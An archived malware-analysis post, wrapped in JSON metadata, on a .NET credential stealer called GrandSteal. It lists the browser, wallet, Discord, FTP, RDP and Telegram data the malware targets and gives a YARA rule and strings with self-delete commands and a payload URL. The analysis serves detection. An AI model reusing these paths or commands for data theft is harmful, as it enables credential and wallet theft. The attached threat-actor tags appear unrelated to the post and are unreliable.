{ "id": "9f4b935c-7c5c-4637-a215-7b69bdcd5bed", "created_at": "2026-04-06T00:17:37.484061Z", "updated_at": "2026-04-10T03:37:09.374451Z", "deleted_at": null, "sha1_hash": "273e5115e607c7e11811058ba8ea8e148fadb6cf", "title": "Analysis of .Net Stealer GrandSteal (2019-03-18)", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 833701, "plain_text": "Analysis of .Net Stealer GrandSteal (2019-03-18)\r\nArchived: 2026-04-05 19:47:13 UTC\r\nIn this post I share my notes about the analysis of a sample (an stealer written in .Net) whose family is unknown to\r\nme (any feedback is welcome, if you know the family for the sample that I describe, please tell me and I will\r\nupdate this post). Somebody tagged the sample as quasar at Any.Run, however, after analyzing it and comparing\r\nwith Quasar code, I concluded this sample doesn't seem to belong to Quasar family. Searching information about\r\nthe collected IoCs was not successful to classify the sample. I am calling it GrandSteal because of the internal\r\nnames of the .Net classes of the malware's decompiled code.\r\nOriginal Packed Sample: 89782B6CDAAAB7848D544255D5FE7002\r\nSource Url: http://a4.doshimotai[.]ru/pxpx.exe\r\nInfo Url: VxVault URLhaus\r\nAutomatic Generated Report: PepperMalware Report\r\nVirustotal First Submission: 2019-03-18 22:28:20\r\nAny.Run Analysis: Here\r\nAny.Run Tags: Evasion, Trojan, Rat, Quasar\r\nMy Classification: I named it GrandSteal because of the internal .Net classes names (if you have any\r\ninformation about any well-known family that this malware belongs to, please, tell me and I will update\r\nthis post)\r\nDecompiled Source Code: PepperMalware Github\r\n1. Loader\r\n2. Unpacked Modules\r\n2.1. List of Unpacked Modules\r\n2.2. Stealer\r\n2.2.1. Chromium Stealer\r\n2.2.1.1. Cookies\r\n2.2.1.2. Credentials\r\n2.2.1.3. Autofills\r\n2.2.1.4. Credit Cards\r\n2.2.2. Wallets Stealer\r\n2.2.3. Files From Personal Directories Stealer\r\n2.2.4. Discord Software Stealer\r\n2.2.5. FileZilla Stealer\r\n2.2.6. Gecko Stealer\r\n2.2.7. RDP Stealer\r\n2.2.8. Telegram Stealer\r\n3. Yara Rule\r\n4. Strings of the Main Unpacked Module\r\nhttp://www.peppermalware.com/2019/03/analysis-of-net-stealer-grandsteal-2019.html\r\nPage 1 of 17\n\n1. Loader\r\nThe sample is not signed.\r\nVersion Info:\r\nProduct Symantec© 2019\r\nDescription pxpx.exe\r\nOriginal Name pxpx.exe\r\nInternal Name pxpx.exe\r\nFile Version 7.1.0.0\r\nComments Symantec Application\r\nThe loader module is a .Net executable that is obfuscated with ConfuserEx v1.0.0 \r\n2. Unpacked Modules\r\n2.1. List of Unpacked Modules\r\nOnce we have executed the sample into the VM, we can check with Windbg that the malware unpacks a set of\r\nmodules in memory:\r\nAfter dumping these executables to disk we check that most of them are .Net executables, that we can decompile\r\nwith dnSpy:\r\nhttp://www.peppermalware.com/2019/03/analysis-of-net-stealer-grandsteal-2019.html\r\nPage 2 of 17\n\nGrandSteal.* are the main modules of the malware. I uploaded the decompiled code for these modules to my\r\nGitHub. Additionally the malware carries some libraries that it will need.\r\n2.2. Stealer\r\nThe malware contains code to steal credentials from different products:\r\n2.2.1. Chromium Stealer\r\nThe malware is able to steal different information from Chromium Browsers:\r\nThe malware steals all the Chromium's information from the browser's sqlite database.\r\n2.2.1.1. Cookies\r\nIt reads the cookies table from the sqlite database.\r\n2.2.1.2. Credentials\r\nIt reads the logins table from the sqlite database.\r\nhttp://www.peppermalware.com/2019/03/analysis-of-net-stealer-grandsteal-2019.html\r\nPage 3 of 17\n\n2.2.1.3. Auto Fills\r\nIt reads the autofill table from the sqlite database.\r\n2.2.1.4. Credit Cards\r\nIt reads the table credit_cards from the sqlite database.\r\n2.2.2. Wallets Stealer\r\nhttp://www.peppermalware.com/2019/03/analysis-of-net-stealer-grandsteal-2019.html\r\nPage 4 of 17\n\nThe malware is able to steal wallets from the following crypto-coin products:\r\nLitecoin: \"%appdata%\\Litecoin\\wallet.dat\"\r\nLitecoin-Qt: walletpath=read(\"HKCU\\Software\\Litecoin\\strDataDir\"), walletpath + \"wallet.dat\"\r\nLitecoin-Qt: walletpath=read(\"HKCU\\Software\\Litecoin-Qt\\strDataDir\"), walletpath + \"wallet.dat\"\r\nBitcoin: \"%appdata%\\Bitcoin\\wallet.dat\"\r\nBitcoin-Qt: walletpath=read(\"HKCU\\Software\\Bitcoin\\strDataDir\"), walletpath + \"wallet.dat\"\r\nBitcoin-Qt: walletpath=read(\"HKCU\\Software\\Bitcoin-Qt\\strDataDir\"), walletpath + \"wallet.dat\"\r\nBytecoin: \"%appdata%\\bytecoin\\*.wallet\"\r\nExodus: \"%appdata%\\Exodus\\*\"\r\nDash-Qt: walletpath=read(\"HKCU\\Software\\Dash\\strDataDir\"), walletpath + \"wallet.dat\"\r\nDash-Qt: walletpath=read(\"HKCU\\Software\\Dash-Qt\\strDataDir\"), walletpath + \"wallet.dat\"\r\nElectrum: \"%appdata%\\Electrum\\wallets\\*\"\r\nEthereum: \"%appdata%\\Ethereum\\wallets\\*\"\r\nMonero: walletpath=read(\"HKCU\\Software\\monero-project\\wallet_path\"), walletpath + \"wallet.dat\"\r\nMonero: walletpath=read(\"HKCU\\Software\\monero-core\\wallet_path\"), walletpath + \"wallet.dat\"\r\n2.2.3. Files From Personal Directories Stealer\r\nThe malware can steal files from Desktop, Favorites and Personal folders:\r\n2.2.4. Discord Software Stealer\r\nFrom wikipedia: \"Discord is a proprietary freeware VoIP application and digital distribution platform designed for\r\nvideo gaming communities, that specializes in text, image, video and audio communication between users in a\r\nchat channel\".\r\nThe malware is able to steal information from this VoIP application by using a curious method. It calls\r\nDbgHelp.dll APIs (MiniDumpWriteDump) to create a minidump of any process containing the word \"Discord\" in\r\nthe name.\r\nhttp://www.peppermalware.com/2019/03/analysis-of-net-stealer-grandsteal-2019.html\r\nPage 5 of 17\n\nOnce the minidump file is created, it searchs the minidump for Discord json sessions by using a regex:\r\n2.2.5. FileZilla Stealer\r\nThe malware reads credentials from FileZilla XML files:\r\nhttp://www.peppermalware.com/2019/03/analysis-of-net-stealer-grandsteal-2019.html\r\nPage 6 of 17\n\n2.2.6. Gecko Stealer\r\nFrom wikipedia: \"Gecko is a browser engine developed by Mozilla. It is used in the Firefox browser, the\r\nThunderbird email client, and many other projects\".\r\nThe malware locates some Gecko important files:\r\nIt is able to recover credentials:\r\nhttp://www.peppermalware.com/2019/03/analysis-of-net-stealer-grandsteal-2019.html\r\nPage 7 of 17\n\nAnd cookies:\r\nThe source code related to this functionality is GeckoManager.cs.\r\n2.2.7. RDP Stealer\r\nThe malware can steal RDP credentials:\r\nThe source code related to this functionality is RdpManager.cs.\r\n2.2.8. Telegram Stealer\r\nThe malware reads the files located at:\r\nhttp://www.peppermalware.com/2019/03/analysis-of-net-stealer-grandsteal-2019.html\r\nPage 8 of 17\n\n\"%appdata%\\Telegram Desktop\\tdata\\D877F783D5D3EF8C\\map*\"\r\nFrom that files, it tries to recover Telegram sessions:\r\n3. Yara Rules\r\n \r\nrule grandsteal {\r\nstrings:\r\n $s1 = \"ws://{0}:{1}/websocket\" wide\r\n $s2 = \"GrabBrowserCredentials: \" wide\r\n $s3 = \"GrabColdWallets: \" wide\r\n $s4 = \"GrabDesktopFiles: \" wide\r\n $s5 = \"GrabTelegram: \" wide\r\n $s6 = \"ColdWallets parser has been started\" wide\r\n $s7 = \"DiscordSession parser has been started\" wide\r\n $s8 = \"Rdps parser has been started\" wide\r\n $s9 = \"DesktopFiles parser has been started\" wide\r\n $s10 = \"FTPs parser has been started\" wide\r\n $s11 = \"TelegramSession parser has been started\" wide\r\n $s12 = \"ListOfProcesses parser has been started\" wide\r\n $s13 = \"ListOfPrograms parser has been started\" wide\r\n $s14 = \"card_number_encrypted\" wide\r\n $s15 = \"\\\\Litecoin\\\\wallet.dat\" wide\r\n $s16 = \"\\\\Bitcoin\\\\wallet.dat\" wide\r\n $s17 = \"\\\\Exodus\\\\exodus.wallet\" wide\r\n $s18 = \"\\\\Electrum\\\\wallets\" wide\r\n $s19 = \"\\\\Ethereum\\\\wallets\" wide\r\n $s20 = \"monero-project\" wide\r\n $s21 = \"Discord dump UNKNOWN\" wide\r\n $s22 = \"{0}\\\\FileZilla\\\\recentservers.xml\" wide\r\nhttp://www.peppermalware.com/2019/03/analysis-of-net-stealer-grandsteal-2019.html\r\nPage 9 of 17\n\n$s23 = \"{0}\\\\FileZilla\\\\sitemanager.xml\" wide\r\n $s24 = \"cookies.sqlite\" wide\r\n $s25 = \"password-check\" wide\r\n $s26 = \"AppData\\\\Roaming\\\\Telegram Desktop\\\\tdata\\\\D877F783D5D3EF8C\" wide\r\n $s27 = \"%USERPROFILE%\\\\AppData\\\\Local\\\\Temp\\\\Remove.bat\" wide\r\n $s28 = \"taskkill /F /PID %1\" wide\r\n $s29 = \"choice /C Y /N /D Y /T 3 \u0026 Del %2\" wide\r\n $s30 = \"ExtractPrivateKey\" wide\r\n $s31 = \"formSubmitURL\" wide\r\n $s32 = \"passwordField\" wide\r\n $s33 = \"usernameField\" wide\r\n $s34 = \"GrabDiscord\" wide\r\n $s35 = \"encryptedPassword\" wide\r\n $s36 = \"masterPassword\" wide\r\n $s37 = \"WalletName\" wide\r\ncondition:\r\n (30 of them)\r\n}\r\n4. Strings of the Main Unpacked Module\r\nhttps://domekan.ru/ModuleMystery/Updates.txt\r\nSQLite format 3\r\nws://{0}:{1}/websocket\r\nServer is initialized\r\nCredentialsRequest has been created\r\nParseClientSettings\r\nGrabBrowserCredentials: \r\nGrabColdWallets: \r\nGrabDesktopFiles: \r\nGrabTelegram: \r\nInvalid JsonMessage data from server. Exception : \r\nClientInfos parser has been started\r\nClientInfos has been parsed.Elapsed time: {0}\r\nBrowsers parser has been started\r\nBrowsers has been parsed.Elapsed time: {0}\r\nColdWallets parser has been started\r\nColdWallets has been parsed.Elapsed time: {0}\r\nDiscordSession parser has been started\r\nDiscordSession has been parsed.Elapsed time: {0}\r\nRdps parser has been started\r\nRdps has been parsed.Elapsed time: {0}\r\nhttp://www.peppermalware.com/2019/03/analysis-of-net-stealer-grandsteal-2019.html\r\nPage 10 of 17\n\nDesktopFiles parser has been started\r\nDesktopFiles has been parsed.Elapsed time: {0}\r\nFTPs parser has been started\r\nFTPs has been parsed.Elapsed time: {0}\r\nTelegramSession parser has been started\r\nTelegramSession has been parsed.Elapsed time: {0}\r\nListOfProcesses parser has been started\r\nListOfProcesses has been parsed.Elapsed time: {0}\r\nListOfPrograms parser has been started\r\nListOfPrograms has been parsed.Elapsed time: {0}\r\nencrypted_value\r\nexpiration_month\r\nexpiration_year\r\ncard_number_encrypted\r\nusername_value\r\npassword_value\r\nAppData\\Roaming\\\r\nAppData\\Local\\\r\n\\Litecoin\\wallet.dat\r\n\\Bitcoin\\wallet.dat\r\n\\Exodus\\exodus.wallet\r\n\\Electrum\\wallets\r\n\\Ethereum\\wallets\r\nmonero-project\r\nJsonSession UNKNOWN\r\nDiscord dump UNKNOWN\r\nDiscord process UNKNOWN\r\n({\"token\":\"(.*)}}]})\r\n{0}\\FileZilla\\recentservers.xml\r\n{0}\\FileZilla\\sitemanager.xml\r\ncookies.sqlite\r\n[^\\u0020-\\u007F]\r\npassword-check\r\nAppData\\Roaming\\Telegram Desktop\\tdata\r\nAppData\\Roaming\\Telegram Desktop\\tdata\\D877F783D5D3EF8C\r\nD877F783D5D3EF8C*\r\nAppData\\Roaming\r\nAppData\\Local\\Temp\r\nThe binary key cannot have an odd number of digits: {0}\r\n%USERPROFILE%\\AppData\\Local\\Temp\\Remove.bat\r\ntaskkill /F /PID %1\r\nchoice /C Y /N /D Y /T 3 \u0026 Del %2\r\nhttp://www.peppermalware.com/2019/03/analysis-of-net-stealer-grandsteal-2019.html\r\nPage 11 of 17\n\nClientSettings.db\r\n 1.85 (Hash, version 2, native byte-order)\r\nFileDescription\r\nGrandSteal.Client.Data\r\nGrandSteal.Client.Data.dll\r\nExtractPrivateKey3\r\nExtractPrivateKey4\r\nget_formSubmitURL\r\nset_formSubmitURL\r\nGrandSteal.Client.Data\r\nRoamingAppData\r\nget_ObjectData\r\nset_ObjectData\r\nSystem.Collections.Generic\r\nMicrosoft.VisualBasic\r\nget_ManagedThreadId\r\nget_CurrentThread\r\nget_timePasswordChanged\r\nset_timePasswordChanged\r\nget_timeLastUsed\r\nset_timeLastUsed\r\nget_timeCreated\r\nset_timeCreated\r\nHandleWorkCompleted\r\nOnWorkCompleted\r\ncountCompleted\r\nOnResponseRecieved\r\nadd_DataReceived\r\nadd_MessageReceived\r\nSystem.Collections.Specialized\r\nget_passwordField\r\nset_passwordField\r\nget_usernameField\r\nset_usernameField\r\nBrowserCreditCard\r\nget_GrabDiscord\r\nget_encryptedPassword\r\nset_encryptedPassword\r\nget__masterPassword\r\nset_WalletName\r\nget_encryptedUsername\r\nset_encryptedUsername\r\nhttp://www.peppermalware.com/2019/03/analysis-of-net-stealer-grandsteal-2019.html\r\nPage 12 of 17\n\nset_AllowUnstrustedCertificate\r\nDebuggerNonUserCodeAttribute\r\nDebuggableAttribute\r\nComVisibleAttribute\r\nAssemblyTitleAttribute\r\nUserScopedSettingAttribute\r\nAssemblyTrademarkAttribute\r\nExtensionAttribute\r\nAssemblyFileVersionAttribute\r\nAssemblyConfigurationAttribute\r\nAssemblyDescriptionAttribute\r\nCompilationRelaxationsAttribute\r\nAssemblyProductAttribute\r\nAssemblyCopyrightAttribute\r\nConfusedByAttribute\r\nParamArrayAttribute\r\nAssemblyCompanyAttribute\r\nRuntimeCompatibilityAttribute\r\nget_SQLDataTypeSize\r\nclientInfoFlag\r\nset_EnableAutoSendPing\r\nSystem.Threading\r\nget_DataEncoding\r\nFromBase64String\r\nDownloadString\r\nCreateTempPath\r\nget_ObjectLength\r\nset_ObjectLength\r\nset_ExpirationMonth\r\nget_Passwordcheck\r\nTransformFinalBlock\r\nReadBrowserCredendtial\r\nExtractManagerCredential\r\nExtractRecentCredential\r\nop_GreaterThanOrEqual\r\nset_AutoSendPingInterval\r\nRuntimeTypeModel\r\nSystem.ComponentModel\r\nGrandSteal.Client.Data.dll\r\nBrowserAutofill\r\nget_BaseStream\r\nUserStreamParam\r\nhttp://www.peppermalware.com/2019/03/analysis-of-net-stealer-grandsteal-2019.html\r\nPage 13 of 17\n\nExceptionParam\r\nget_GrabTelegram\r\nSymmetricAlgorithm\r\nICryptoTransform\r\nIsNullExtension\r\nDiscordSession\r\ndiscordSession\r\nTelegramSession\r\ntelegramSession\r\nFindDiscordJsonSession\r\nGrandSteal.SharedModels.Communication\r\nset_ClientInformation\r\nRemoteClientInformation\r\nSystem.Configuration\r\nSystem.Globalization\r\nSystem.Reflection\r\nStringCollection\r\nMatchCollection\r\nCryptographicException\r\nArgumentException\r\nGeckoPasswordBasedEncryption\r\nGrandSteal.Client.Models.Extensions.Json\r\nFileSystemInfo\r\nProcessStartInfo\r\nGrandSteal.Client.Data.Gecko\r\nDeSerializeProto\r\nMiniDumpWriteDump\r\nset_ExpirationYear\r\nKey4MagicNumber\r\nset_CardNumber\r\nSHA1CryptoServiceProvider\r\nMD5CryptoServiceProvider\r\nTripleDESCryptoServiceProvider\r\nCrytoServiceProvider\r\nIFormatProvider\r\nFileZillaManager\r\nDiscordManager\r\nDesktopFileManager\r\nTelegramManager\r\nChromiumManager\r\nColdWalletManager\r\nConvertToInteger\r\nhttp://www.peppermalware.com/2019/03/analysis-of-net-stealer-grandsteal-2019.html\r\nPage 14 of 17\n\nObjectIdentifier\r\nResponseHandler\r\nSystem.CodeDom.Compiler\r\nClientInfoHelper\r\nRecoveryHelper\r\nGrandSteal.Client.Data.Server\r\nInitializeServer\r\nCreateDecryptor\r\nSystem.Diagnostics\r\nAddMilliseconds\r\ntimeoutMilliseconds\r\nget_BrowserCreditCards\r\nset_BrowserCreditCards\r\nGetCreditCards\r\nSystem.Runtime.InteropServices\r\nMicrosoft.VisualBasic.CompilerServices\r\nSystem.Runtime.CompilerServices\r\nDebuggingModes\r\nget_ChildNodes\r\nget_BrowserCookies\r\nset_BrowserCookies\r\nget_Directories\r\nGetDirectories\r\nget_MasterEntries\r\nset_MasterEntries\r\nExpandEnvironmentVariables\r\nMicrosoft.Win32.SafeHandles\r\nset_DesktopFiles\r\nget_GrabDesktopFiles\r\nset_BrowserProfiles\r\nbrowserProfiles\r\nset_AutoAddMissingTypes\r\nListOfProcesses\r\nRecieveSettings\r\nClientSettings\r\nDataReceivedEventArgs\r\nMessageReceivedEventArgs\r\nErrorEventArgs\r\nget_BrowserCredendtials\r\nset_BrowserCredendtials\r\nGrandSteal.Client.Models.Credentials\r\nSendCredentials\r\nhttp://www.peppermalware.com/2019/03/analysis-of-net-stealer-grandsteal-2019.html\r\nPage 15 of 17\n\nrdpCredentials\r\nset_FtpCredentials\r\nExtractFtpCredentials\r\nftpCredentials\r\nget_GrabBrowserCredentials\r\nGetCredentials\r\nGrandSteal.SharedModels.Models\r\nGrandSteal.Client.Models\r\nGrandSteal.SharedModels\r\nget_BrowserAutofills\r\nset_BrowserAutofills\r\nGrandSteal.Client.Models.Extensions.Nulls\r\nset_InstalledPrograms\r\nListOfPrograms\r\nGrandSteal.Client.Models.Extensions\r\nget_DesktopFileExtensions\r\nset_DesktopFileExtensions\r\nJsonExtensions\r\nProtoExtensions\r\nget_DesktopExtensions\r\nset_DesktopExtensions\r\nRequestsExtensions\r\nSystem.Text.RegularExpressions\r\nSystem.Collections\r\nset_RdpConnections\r\nStringSplitOptions\r\nget_DesktopFileManagers\r\nget_RdpManagers\r\nget_FtpManagers\r\nget_BrowserCredentialsManagers\r\nget_ColdWalletManagers\r\nGrandSteal.Client.Data.Helpers\r\nRuntimeHelpers\r\nFindDisordProcess\r\nGetCurrentProcess\r\nset_ColdWallets\r\nget_GrabColdWallets\r\nget_disabledHosts\r\nset_disabledHosts\r\nGrabLitecoinQt\r\nCommunicationObject\r\nReadTableFromOffset\r\nhttp://www.peppermalware.com/2019/03/analysis-of-net-stealer-grandsteal-2019.html\r\nPage 16 of 17\n\nget__globalSalt\r\nget__entrySalt\r\nGetValueOrDefault\r\nCredentialManagement\r\nget_DocumentElement\r\nget_SqlStatement\r\nset_SqlStatement\r\nAutoResetEvent\r\nset_Screenshot\r\nCredentialsRequest\r\nset_ProcessList\r\nset_CreateNoWindow\r\nConvertHexStringToByteArray\r\nInitializeArray\r\nFindValueByKey\r\nSystem.Security.Cryptography\r\nGetEntryAssembly\r\nCreateTempCopy\r\nGrandSteal.Client.Data.Recovery\r\nset_WorkingDirectory\r\nprofilesDirectory\r\nGetCurrentDirectory\r\nGeckoRootEntry\r\nSource: http://www.peppermalware.com/2019/03/analysis-of-net-stealer-grandsteal-2019.html\r\nhttp://www.peppermalware.com/2019/03/analysis-of-net-stealer-grandsteal-2019.html\r\nPage 17 of 17", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "http://www.peppermalware.com/2019/03/analysis-of-net-stealer-grandsteal-2019.html" ], "report_names": [ "analysis-of-net-stealer-grandsteal-2019.html" ], "threat_actors": [ { "id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12", "created_at": "2023-01-06T13:46:39.396409Z", "updated_at": "2026-04-10T02:00:03.312816Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "CHROMIUM", "ControlX", "TAG-22", "BRONZE UNIVERSITY", "AQUATIC PANDA", "RedHotel", "Charcoal Typhoon", "Red Scylla", "Red Dev 10", "BountyGlad" ], "source_name": "MISPGALAXY:Earth Lusca", "tools": [ "RouterGod", "SprySOCKS", "ShadowPad", "POISONPLUG", "Barlaiy", "Spyder", "FunnySwitch" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df", "created_at": "2023-01-06T13:46:38.402513Z", "updated_at": "2026-04-10T02:00:02.959797Z", "deleted_at": null, "main_name": "Sandworm", "aliases": [ "IRIDIUM", "Blue Echidna", "VOODOO BEAR", "FROZENBARENTS", "UAC-0113", "Seashell Blizzard", "UAC-0082", "APT44", "Quedagh", "TEMP.Noble", "IRON VIKING", "G0034", "ELECTRUM", "TeleBots" ], "source_name": "MISPGALAXY:Sandworm", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "3a0be4ff-9074-4efd-98e4-47c6a62b14ad", "created_at": "2022-10-25T16:07:23.590051Z", "updated_at": "2026-04-10T02:00:04.679488Z", "deleted_at": null, "main_name": "Energetic Bear", "aliases": [ "ATK 6", "Blue Kraken", "Crouching Yeti", "Dragonfly", "Electrum", "Energetic Bear", "G0035", "Ghost Blizzard", "Group 24", "ITG15", "Iron Liberty", "Koala Team", "TG-4192" ], "source_name": "ETDA:Energetic Bear", "tools": [ "Backdoor.Oldrea", "CRASHOVERRIDE", "Commix", "CrackMapExec", "CrashOverride", "Dirsearch", "Dorshel", "Fertger", "Fuerboos", "Goodor", "Havex", "Havex RAT", "Hello EK", "Heriplor", "Impacket", "Industroyer", "Karagany", "Karagny", "LightsOut 2.0", "LightsOut EK", "Listrix", "Oldrea", "PEACEPIPE", "PHPMailer", "PsExec", "SMBTrap", "Subbrute", "Sublist3r", "Sysmain", "Trojan.Karagany", "WSO", "Webshell by Orb", "Win32/Industroyer", "Wpscan", "nmap", "sqlmap", "xFrost" ], "source_id": "ETDA", "reports": null }, { "id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa", "created_at": "2022-10-25T16:47:55.919702Z", "updated_at": "2026-04-10T02:00:03.618194Z", "deleted_at": null, "main_name": "IRON VIKING", "aliases": [ "APT44 ", "ATK14 ", "BlackEnergy Group", "Blue Echidna ", "CTG-7263 ", "ELECTRUM ", "FROZENBARENTS ", "Hades/OlympicDestroyer ", "IRIDIUM ", "Qudedagh ", "Sandworm Team ", "Seashell Blizzard ", "TEMP.Noble ", "Telebots ", "Voodoo Bear " ], "source_name": "Secureworks:IRON VIKING", "tools": [ "BadRabbit", "BlackEnergy", "GCat", "NotPetya", "PSCrypt", "TeleBot", "TeleDoor", "xData" ], "source_id": "Secureworks", "reports": null }, { "id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7", "created_at": "2025-08-07T02:03:24.688416Z", "updated_at": "2026-04-10T02:00:03.734754Z", "deleted_at": null, "main_name": "BRONZE UNIVERSITY", "aliases": [ "Aquatic Panda", "Aquatic Panda ", "CHROMIUM", "CHROMIUM ", "Charcoal Typhoon", "Charcoal Typhoon ", "Earth Lusca", "Earth Lusca ", "FISHMONGER ", "Red Dev 10", "Red Dev 10 ", "Red Scylla", "Red Scylla ", "RedHotel", "RedHotel ", "Tag-22", "Tag-22 " ], "source_name": "Secureworks:BRONZE UNIVERSITY", "tools": [ "Cobalt Strike", "Fishmaster", "FunnySwitch", "Spyder", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "6abcc917-035c-4e9b-a53f-eaee636749c3", "created_at": "2022-10-25T16:07:23.565337Z", "updated_at": "2026-04-10T02:00:04.668393Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Bronze University", "Charcoal Typhoon", "Chromium", "G1006", "Red Dev 10", "Red Scylla" ], "source_name": "ETDA:Earth Lusca", "tools": [ "Agentemis", "AntSword", "BIOPASS", "BIOPASS RAT", "BadPotato", "Behinder", "BleDoor", "Cobalt Strike", "CobaltStrike", "Doraemon", "FRP", "Fast Reverse Proxy", "FunnySwitch", "HUC Port Banner Scanner", "KTLVdoor", "Mimikatz", "NBTscan", "POISONPLUG.SHADOW", "PipeMon", "RbDoor", "RibDoor", "RouterGod", "SAMRID", "ShadowPad Winnti", "SprySOCKS", "WinRAR", "Winnti", "XShellGhost", "cobeacon", "fscan", "lcx", "nbtscan" ], "source_id": "ETDA", "reports": null }, { "id": "d53593c3-2819-4af3-bf16-0c39edc64920", "created_at": "2022-10-27T08:27:13.212301Z", "updated_at": "2026-04-10T02:00:05.272802Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Earth Lusca", "TAG-22", "Charcoal Typhoon", "CHROMIUM", "ControlX" ], "source_name": "MITRE:Earth Lusca", "tools": [ "Mimikatz", "PowerSploit", "Tasklist", "certutil", "Cobalt Strike", "Winnti for Linux", "Nltest", "NBTscan", "ShadowPad" ], "source_id": "MITRE", "reports": null }, { "id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6", "created_at": "2022-10-25T15:50:23.339976Z", "updated_at": "2026-04-10T02:00:05.27483Z", "deleted_at": null, "main_name": "Sandworm Team", "aliases": [ "Sandworm Team", "ELECTRUM", "Telebots", "IRON VIKING", "BlackEnergy (Group)", "Quedagh", "Voodoo Bear", "IRIDIUM", "Seashell Blizzard", "FROZENBARENTS", "APT44" ], "source_name": "MITRE:Sandworm Team", "tools": [ "Bad Rabbit", "Mimikatz", "Exaramel for Linux", "Exaramel for Windows", "GreyEnergy", "PsExec", "Prestige", "P.A.S. Webshell", "AcidPour", "VPNFilter", "Neo-reGeorg", "Cyclops Blink", "SDelete", "Kapeka", "AcidRain", "Industroyer", "Industroyer2", "BlackEnergy", "Cobalt Strike", "NotPetya", "KillDisk", "PoshC2", "Impacket", "Invoke-PSImage", "Olympic Destroyer" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434657, "ts_updated_at": 1775792229, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/273e5115e607c7e11811058ba8ea8e148fadb6cf.pdf", "text": "https://archive.orkl.eu/273e5115e607c7e11811058ba8ea8e148fadb6cf.txt", "img": "https://archive.orkl.eu/273e5115e607c7e11811058ba8ea8e148fadb6cf.jpg" } }